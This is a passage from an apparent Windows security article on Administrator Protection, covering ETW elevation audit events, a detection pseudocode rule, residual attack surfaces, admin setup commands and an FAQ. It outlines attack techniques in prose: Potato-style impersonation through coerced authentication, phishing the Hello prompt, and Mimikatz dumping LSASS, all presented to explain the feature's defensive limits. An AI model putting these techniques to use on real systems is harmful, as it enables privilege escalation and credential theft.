The architecture survives audit. The deployment is held back by twenty years of accumulated software assumptions. The next section asks what tools defenders now have that they did not have before.

14. The audit and detection surface

Every privileged operation on a device with Administrator Protection enabled now generates an ETW (Event Tracing for Windows) event in the Microsoft-Windows-LUA provider [@ms-admin-protection]. This is the first time the elevation pipeline itself is the source of a stable, operationally useful audit trail.

The basics.

Provider: Microsoft-Windows-LUA, GUID {93c05d69-51a3-485e-877f-1806a8731346}.
Event ID 15031: Elevation Approved.
Event ID 15032: Elevation Denied or Failed.

Each event carries the caller user SID, the application name and path, the elevation outcome, the SMAA used to host the elevation, and the authentication method (Hello PIN, biometric, password) [@ms-admin-protection]. The authentication method field records the primary user's Hello credential, not the SMAA's; the SMAA's authentication in step 6 of §7 is the credential-less LSA logon and has no method field of its own. The Microsoft Learn-documented logman invocation to capture the trace is short:

The Event Tracing for Windows provider that surfaces Administrator Protection elevation events. Provider GUID `{93c05d69-51a3-485e-877f-1806a8731346}`. Event ID 15031 marks an elevation that succeeded; Event ID 15032 marks an elevation that was denied or failed. Each event carries fields for the caller's SID, the application path, the elevation outcome, the SMAA used, and the authentication method [@ms-admin-protection].

{` // Pseudocode for a detection pipeline that reads ETW Event 15031 // (Administrator Protection elevation approved) and flags unusual // application paths per SMAA correlation key.

const allowList = new Set([ 'C:\\Windows\\System32\\mmc.exe', 'C:\\Windows\\System32\\regedit.exe', 'C:\\Windows\\System32\\cmd.exe', 'C:\\Program Files\\Microsoft VS Code\\Code.exe', ]);

function onEtwEvent(event) { if (event.provider !== 'Microsoft-Windows-LUA') return; if (event.id !== 15031) return;

const smaa = event.fields.shadowAccountName; const app = event.fields.applicationPath; const auth = event.fields.authenticationMethod; const user = event.fields.callerUserSid;

if (!allowList.has(app)) { emit({ severity: 'high', title: 'Unexpected elevation under Administrator Protection', smaa, app, auth, user, hint: 'Was the Hello prompt phished?' }); } } `}

Note: For detection engineers, the ADMIN_<random> name is the highest-value correlation key on the device. It is stable per primary admin (the SMAA name is created once and persists across elevations), distinct from the limited-user SID (the SMAA has its own SID, so user-by-SID correlations and SMAA-by-name correlations are independent axes), and present in every ETW 15031 / 15032 event. A detection rule that groups elevations by SMAA name and flags unexpected application paths is the canonical "someone phished a Hello prompt" alert pattern.

Defenders now have the audit trail they did not have under UAC. The next section asks what residual attack surface survives the SMAA architecture, the Hello gate, and the new audit trail.

15. Open problems: what survives

Five residual attack surfaces, each acknowledged in Microsoft's own documentation, Forshaw's Project Zero posts, or the operational literature on Windows privilege escalation.

The user is still the weak link. Every elevation depends on a human accepting the prompt. The Hello credential gate makes that human's decision more costly to fake than the classic Yes/No, but the gate does not change the fact that a successful prompt is a successful elevation. The three sub-cases of consent-without-identity-verification from §9 -- unattended-session, habituated-click, pretext click-through -- are cost-raised, not closed. Phishing-the-prompt remains a live attack surface and Microsoft does not classify it as a vulnerability [@forshaw-pz-jan2026]. Out-of-band consent -- a phone-push approval channel, a smartcard tap, a separate hardware key tap -- would close the gap; none of these is the Administrator Protection default.

Loopback authentication. The structural property that Windows services authenticate to themselves over the local network stack is independent of the SMAA model. SMB to localhost, Kerberos against the local machine account, NTLM challenge-response between processes on the same box -- these protocols predate UAC and are not changed by Administrator Protection. Forshaw's broader 2022 Kerberos research [@forshaw-2022-rbcd] catalogues the class. The NTLMless article in this series covers SMB signing, Extended Protection for Authentication (EPA), and channel binding mitigations that defenders should pair with Administrator Protection to close the loopback path.

Service-account SeImpersonatePrivilege. The Potato lineage of attacks (cataloged in the Access Control article in this series) runs in service accounts (IIS_IUSRS, LOCAL SERVICE, NETWORK SERVICE), not in interactive admin sessions. Administrator Protection scopes itself to interactive admin elevation; the Potato class is structurally out of scope.

Service-account Potato attacks run inside `IIS_IUSRS`, `LOCAL SERVICE`, and `NETWORK SERVICE` rather than in interactive admin sessions. The attacker has compromised a service that holds `SeImpersonatePrivilege`, then uses one of several primitives (the SSPI / NEGOEX dance, the EFS RPC interface, a printer-spooler endpoint) to coerce a higher-privileged service into authenticating against the attacker's local socket, and impersonates the resulting token. Administrator Protection's promise is around the *interactive elevation* path -- the flow from a logged-in user clicking an installer to an elevated process running. Potato is a separate problem class with its own mitigations: removing `SeImpersonatePrivilege` from service accounts that don't need it, applying EPA, and patching the named primitives one by one.

Driver loading once inside an SMAA elevation. Admin equals kernel applies once a process is running inside the SMAA. Vulnerable-driver loading, kernel-mode code execution, and rootkit installation fall under the §11 "admin equals kernel" ceiling -- WHQL signing, the Vulnerable Driver Blocklist, App Control for Business, and HVCI remain the four-mechanism mitigation surface, with the App Identity article in this series covering the App Control mechanism. Administrator Protection does not change the relationship between admin and kernel; it changes the relationship between standard user and admin.

The Hello credential phishing surface. The prompt now phishes a real credential rather than a click-through approval. A malicious application that successfully argues its case to the user gets a Hello gesture against the primary user's PIN or biometric. The credential remains hardware-rooted; ESS-engaged biometrics never leave the TPM or Pluton enclave; the malware does not learn the PIN. But the malware does get the elevation. The Windows Hello article in this series covers FIDO2 / ESS / PIN architecture hardening. Defender-side mitigation is the ETW 15031 / 15032 detection rule set on unexpected application paths [@ms-admin-protection].

The boundary is real, the audit trail is new, and the five-class residual surface is the next decade of work. The next section turns to operator-side practicalities.

16. Practical guide

Six tips, each tied to one Microsoft Learn or Windows Developer Blog primary source. Remember that, as of December 2025, Microsoft has reverted the rollout and the feature is currently disabled on stable Windows; the guidance below applies once Microsoft re-enables it. The Spoiler below contains the verbatim commands.

Enable. Set TypeOfAdminApprovalMode = 2 via Group Policy ("User Account Control: Configure type of Admin Approval Mode" -> "Admin Approval Mode with Administrator Protection") or via the Intune Settings Catalog OMA-URI. A reboot is required for the new policy to take effect [@ms-admin-protection, @ms-kb5067036].
Verify. Run whoami in an elevated console. The profile name shows ADMIN_<random>. Run whoami /priv to confirm the SMAA has the Administrators group enabled [@ms-admin-protection, @call4cloud-osint].
Capture. Start the ETW trace with the documented logman invocation; filter for Event IDs 15031 and 15032 [@ms-admin-protection]. The provider GUID is stable across builds.
Do not enable on devices that require Hyper-V or WSL. Re-evaluate when Microsoft re-enables the broad rollout [@ms-admin-protection, @forshaw-pz-jan2026].
For application developers, follow the Windows Developer Blog (May 19, 2025) guidance [@ms-developer-blog-2025]: install per-user packages unelevated; use %ProgramFiles% (and accept the elevated install path); avoid context switching during install; avoid sharing files between elevated and unelevated profiles; remove auto-elevation dependencies. The auto-elevation manifest attribute is no longer honoured under Administrator Protection, so any installer that relied on silent elevation needs to be reworked.
For IT admins on already-enabled devices broken by an elevated install: disable Administrator Protection temporarily, reinstall the application unelevated, then re-enable [@ms-developer-blog-2025].

Enable via Group Policy registry value (administrator console, persists across reboots):

# Set TypeOfAdminApprovalMode to 2 (Admin Approval Mode with Administrator Protection)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v TypeOfAdminApprovalMode /t REG_DWORD /d 2 /f
# Reboot required:
shutdown /r /t 0

Capture the elevation event trace:

logman start AdminProtectionTrace -p {93c05d69-51a3-485e-877f-1806a8731346} -ets
:: After some elevations:
logman stop AdminProtectionTrace -ets
:: Process the .etl with PerfView, Message Analyzer, or:
wevtutil qe Microsoft-Windows-LUA/Operational /q:"*[System[(EventID=15031 or EventID=15032)]]" /f:text

Verify the SMAA presence after enablement:

Get-LocalUser | Where-Object Name -like 'ADMIN_*'
# After an elevation, run from the elevated console:
whoami
# Expect: WIN11-PC\ADMIN_<random16hex>

Note: The single most common mistake in response to an Administrator Protection compatibility problem is to disable UAC globally by setting EnableLUA = 0. This returns the device to the Windows XP single-token model, removes Mandatory Integrity Control enforcement on application processes, and effectively defeats every layer of UAC and Administrator Protection together. It is universally discouraged. The correct fix is per-application, via manifest, or per-device, via the documented Administrator Protection compatibility list.

Six tips, one boundary, one operational checklist. The next section answers the most common misconceptions.

17. Frequently asked questions

No. Administrator Protection runs in `appinfo.dll` inside the Application Information service, which runs in `svchost.exe` in VTL0 (the normal Windows kernel context). The SMAA itself is a normal SAM-database account, not a Virtual Secure Mode trustlet. The cross-process protections of Virtualization-Based Security apply to LSASS Credential Guard and a handful of other VTL1 services; the elevation pipeline is not one of them. The Secure Kernel article in this series treats VTL0 / VTL1 separation in detail. Partially. Administrator Protection replaces Admin Approval Mode UAC when `TypeOfAdminApprovalMode = 2`. The credential-prompt path (the over-the-shoulder elevation that asks a standard user to enter an administrator's credentials) and classic Admin Approval Mode (`TypeOfAdminApprovalMode = 1`) coexist with Administrator Protection across different configurations [@ms-admin-protection]. On a device with Administrator Protection enabled, only the interactive admin's elevation path goes through the SMAA; the standard-user-asking-for-admin-credentials path is unchanged. No. There is absolutely an admin token; it lives in a different account, in a different logon session, for a bounded lifetime. The marketing language describes lifetime and isolation, not nonexistence [@ms-developer-blog-2025, @bleepingcomputer-2024]. The SMAA's token persists for the lifetime of the elevated process; when the process exits, the token handle is released and the logon session is reaped. Between elevations, no SMAA token exists in memory. No. Malware can still elevate if the user accepts the Hello prompt. The boundary Administrator Protection creates is between *silent* elevation and *consented* elevation, not between any elevation and none. Microsoft's design position is explicit: "I expect that malware will still be able to get administrator privileges even if that's just by forcing a user to accept the elevation prompt" [@forshaw-pz-jan2026]. The three sub-cases of consent-without-identity-verification from §9 are cost-raised, not eliminated. What changes is that the elevation must be visible. Defenders gain the ETW 15031 audit trail as a result. No. EPM uses a virtual elevated account on a per-request basis with cloud-side policy, and the virtual account is *not* a member of the local Administrators group [@ms-epm-overview]. Administrator Protection uses a persistent local SMAA per admin user, with on-box `appinfo.dll` policy, and the SMAA *is* a member of the local Administrators group [@call4cloud-osint]. EPM is centrally policy-driven and works on standard-user devices; Administrator Protection is per-device architecture and applies only to interactive admin users. The two can coexist on the same device. No. Per Microsoft Learn, remote logon, roaming profiles, and backup admins are out of scope [@ms-admin-protection]. A domain administrator who logs into a workstation interactively will not see the SMAA path. Microsoft has stated that domain scenarios may be added in future iterations; the current GA-target form is local-machine-only, interactive-admin-only. No. Mimikatz inside the elevated SMAA session still has `SeDebugPrivilege` and can call `OpenProcess` on `lsass.exe` to dump LSASS unless LSA Protection (Run As Protected Process Light) and Credential Guard are also enabled. Administrator Protection protects the *elevation path*; it does not protect the *resulting privileged session*. To protect the privileged session, pair Administrator Protection with LSA Protection (`RunAsPPL=1`), Credential Guard, App Control for Business, and HVCI. The Secure Kernel article in this series covers the LSA Protection mechanism.

The misconceptions are cleared. The next section returns to the opening hook with the new vocabulary the article has built.

18. The user-elevation companion to Credential Guard

Return to the two whoami /all outputs from §1, this time with the vocabulary the article has built.

The first output shows the primary user under classic UAC. One SID, one profile, one HKCU, one logon-session LUID; the elevated console is the same user as the unelevated console, distinguished only by the integrity level on the token.

The second output shows the same login under Administrator Protection. A different user name -- ADMIN_<random> -- with a different SID linked to the primary admin via ShadowAccountForwardLinkSid and ShadowAccountBackLinkSid. A different profile under C:\Users\ADMIN_<random>\. A different NTUSER.DAT mapped as HKCU. A fresh authentication-ID LUID minted by LSASS through the credential-less logon path described in §7, on the strength of appinfo.dll's trusted request and a Hello gesture the primary user just performed. An ETW Event 15031 in the Microsoft-Windows-LUA provider, freshly emitted, recording the elevation as approved, the application path, and the authentication method.

The thesis lands. The elevation path is now itself a security boundary, with bulletin-grade fixes when it fails. Administrator Protection is the user-elevation companion to Credential Guard. Where Credential Guard isolated LSA secrets from admin-equals-kernel inside the machine -- the Secure Kernel article in this series covers the VBS-rooted isolation in detail -- Administrator Protection isolates the elevation path from the standard-user session. The two answer the two halves of the question the foundational Access Control article in this series left open: if admin equals kernel and tokens are bearer credentials, what is left to harden? The answer is the path that gets you there (Administrator Protection) and the data that is there once you arrive (Credential Guard).

The December 2025 revert is the first iteration's learning round. The architecture is the right one. The application base catches up next. Forshaw's framing in February 2026 -- that Microsoft might have shipped this as a configurable mode rather than replacing admin approval completely -- is a reasonable critique, and the re-enablement is likely to address it. Until then, the operational reality on most stable Windows devices is the classic split-token model, with all the bypass canon it implies, and the SMAA design remains an Insider-Preview-and-policy-opted-in posture.

What stays unchanged is the structural insight. The mechanism Microsoft used to make the elevation path a boundary is not novel; multi-user accounts have shipped in Windows NT since 1993. What changed is the classification. Microsoft accepted, after twenty years of evidence, that the elevation pipeline needed to be a security boundary, and accepted with it the engineering cost: separate accounts, separate profiles, separate logon sessions, removal of auto-elevation, a credential gate instead of a click-through, an audit-trail ETW provider, and a willingness to ship bulletin-grade fixes for every Forshaw finding. The classification was the engineering decision. Everything else followed.

This is what it took, in mechanism and in time, to make the elevation path real [@forshaw-pz-jan2026].

Parag Mali - tag: windows

The Twenty-Year Local Admin Password Crisis: From GPP cpassword to Windows LAPS

1. One Password, Fifty Thousand Laptops

2. Origins: Why Every Workstation Had the Same Local-Admin Password (1998-2008)

3. Decoration Is Not Encryption: GPP cpassword (2008-2012)

6. The In-Box Era: Windows LAPS (April 11, 2023 to Present)

Encryption-at-rest with CNG DPAPI

The backup-directory choice

Policy surface and the FQ-anchored corrections

PasswordComplexity values 5 through 8 (Windows 11 24H2+ / Windows Server 2025+)

PowerShell surface and one important cmdlet name

Migration coexistence

7. The 2026 Baseline as a Settings Table

The audit-primitives sub-table

8. When LAPS Is Not the Right Tool

9. What LAPS Structurally Cannot Solve

10. Open Problems in 2026

11. Practitioner Field Manual and FAQ

The audit-and-migrate seven-step list

Sidebar A: MS16-072 is NOT the LAPS attribute-readability bulletin

Sidebar B: "Hybrid joined" is not "Hybrid Worker"

Sidebar C: How GPP cpassword still gets found in 2026

CNG Architecture: BCrypt, NCrypt, KSPs, and How Windows Picks Its Algorithms

1. From CAPI to CNG: why Microsoft started over

2. BCrypt: the symmetric stack and the ephemeral key

3. NCrypt: where the long-lived secrets live

4. The KSP model: one API, many places to keep keys

4.1 The Microsoft Software KSP

4.2 The Microsoft Platform Crypto Provider (TPM and Pluton)

4.3 The Microsoft Smart Card KSP

4.4 Third-party HSM and security-key KSPs

5. The TPM KSP, attestation, and the hardware boundary

6. FIPS 140 mode, compliance, and the one-bit toggle

7. The post-quantum slide: ML-KEM, ML-DSA, and the agility test

8. Where CNG actually shows up: TLS, BitLocker, and friends

9. DPAPI-NG: a worked example of the NCrypt model

10. Engineering takeaways: choosing the right tool

Frequently asked questions

Two Routes to Code Integrity: Linux IMA + AppArmor vs Windows WDAC + AMSI

1. Two bypasses, same architectural shape

2. The question both operating systems are trying to answer

3. Two genesis stories

4. Where the naive approach breaks

Story A: IMA-as-shipped (2009) without EVM

Story B: AMSI as shipped (2015) inside the script host

Story C: WDAC's "trust all Microsoft-signed code" anti-pattern

Story D: fapolicyd's permissive-window failure

5. The architectural pivots

EVM (Linux 3.2, January 2012): the xattrs become non-forgeable

IMA-appraise (Linux 3.7, December 2012): from observation to enforcement

HVCI / Memory Integrity (Windows 10 1607, August 2016): the secure kernel

IPE (Linux 6.12, November 2024): property-based decisions

fs-verity (Linux 5.4, November 2019): O(log n) per page

6. The stack today, side by side

6.1 Code-integrity enforcers: IMA + EVM vs WDAC vs IPE

6.2 Mandatory access control: AppArmor vs SELinux

6.3 Hypervisor-anchored CI: HVCI

6.4 Script-level inspection: AMSI vs Linux's gap

6.5 Cloud reputation: Smart App Control

6.6 fs-verity as the per-file Merkle layer

7. Bypass arms races

The AMSI bypass family

The WDAC LOLBin arms race

fapolicyd permissive-window

IMA / EVM offline-key attacks

The cross-stack symmetry

8. What the theory says

Rice's theorem

No software-only protection of an in-process secret

No verification of dynamically generated executable code

Cryptographic bounds

9. Open frontiers

Linux integrity at distribution scale: the Integrity Digest Cache

Out-of-process AMSI broker

Cross-OS attestation

10. Practitioner decision guide

Common implementation pitfalls

From `cmd.exe` to a Kusto Row in 90 Seconds: How Sysmon and Defender for Endpoint Actually Work

1. From cmd.exe to a Kusto Row in Ninety Seconds

The seven layers

1. From `cmd.exe` to a Kusto Row in Ninety Seconds

8. Six `Device*` Tables and One Worked KQL Query